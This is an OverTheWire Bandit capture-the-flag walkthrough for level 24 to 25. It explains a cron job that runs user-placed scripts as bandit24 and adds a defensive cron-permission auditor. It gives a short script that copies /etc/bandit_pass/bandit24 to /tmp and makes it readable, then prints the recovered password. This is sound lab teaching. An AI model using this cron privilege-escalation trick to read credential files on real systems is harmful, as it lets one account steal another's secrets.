OverTheWire - Bandit: Level 24 to Level 25
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
As in the previous levels, the cron job runs a script from /usr/bin/ every minute:
```
$ cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
```
The script has the following content:
```
$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname/foo
echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
for i in * .*;
do
    # skip the . and .. directory entries matched by the .* glob
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        # only files owned by bandit23 are run, with a 60 second SIGKILL timeout
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done
```
Let's dissect what exactly this script does. The variable myname will be bandit24, since that is the user running the cron job, so the directory operated on is /var/spool/bandit24/foo. For every entry in that directory (except . and ..) the owner is checked. If the owner is bandit23 (our current user), the file is executed with a maximum run time of 60 seconds, after which signal 9 (SIGKILL) is sent to kill the process. Afterwards the file is removed, whether it was executed or not.
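The level's own hint is to read /etc/cron.d/ and see which command runs as which user. The following auditor, added here and not part of the original writeup or of OverTheWire's code, does that generically: it parses a cron.d file, prints each job's user and command, and flags commands whose script file is group- or world-writable, which is the general condition behind this level (code a low-privileged user can modify being executed as another account). The sample cron file and scripts are constructed in a temporary directory; the Bandit job itself is only exposed through the spool directory its script walks, which this file-mode check cannot see without reading the script body.

```bash
#!/bin/bash
# Parse a cron.d file and print "user command" for each job line.
# A job has five time fields or one @keyword, then the user, then the command.
parse_cron_file() {
  while read -r f1 f2 f3 f4 f5 f6 f7 _rest; do
    case "$f1" in ''|'#'*) continue ;; esac        # skip blanks and comments
    case "$f1" in @*) echo "$f2 $f3" ;; *) echo "$f6 $f7" ;; esac
  done < "$1"
}

# Print "user command mode" for every job whose command file can be written
# by its group or by everyone (octal mode has bit 020 or 002 set).
find_writable_jobs() {
  parse_cron_file "$1" | while read -r user cmd; do
    [ -f "$cmd" ] || continue                       # command not a regular file
    mode=$(stat --format '%a' "$cmd")
    if [ $(( 0$mode & 022 )) -ne 0 ]; then
      echo "$user $cmd $mode"
    fi
  done
}

# Constructed sample (not real system data): one tidy job and one whose
# script is mode 777, so anyone could replace the code it runs.
setup_sample() {
  dir=$(mktemp -d)
  printf '#!/bin/sh\necho ok\n' > "$dir/safe.sh";  chmod 755 "$dir/safe.sh"
  printf '#!/bin/sh\necho ok\n' > "$dir/loose.sh"; chmod 777 "$dir/loose.sh"
  printf '@reboot root %s &> /dev/null\n* * * * * root %s &> /dev/null\n' \
    "$dir/safe.sh" "$dir/loose.sh" > "$dir/cronjob_sample"
  echo "$dir"
}

sample=$(setup_sample)
find_writable_jobs "$sample/cronjob_sample"   # reports only the 777 script
```

On a real host the same function can be pointed at each file under /etc/cron.d/ in turn; the parse step uses the same field layout as the cronjob_bandit24 entry shown above.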
To "exploit" this, we can place our own shell script (owned by bandit23) in that directory, so that the cron job runs it as bandit24, a user that can read the password stored at /etc/bandit_pass/bandit24. The easiest approach is to copy that file to a known location and loosen its permissions so our user can read it. Something like:
```
#! /bin/bash
cp /etc/bandit_pass/bandit24 /tmp/shoujin_bandit24
chmod og+r /tmp/shoujin_bandit24
```
This script must be placed in /var/spool/bandit24/foo and made executable via chmod uog+x <script>.
After a short waiting period we can read the password from the copied file.
```
$ cat /tmp/shoujin_bandit24
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar
```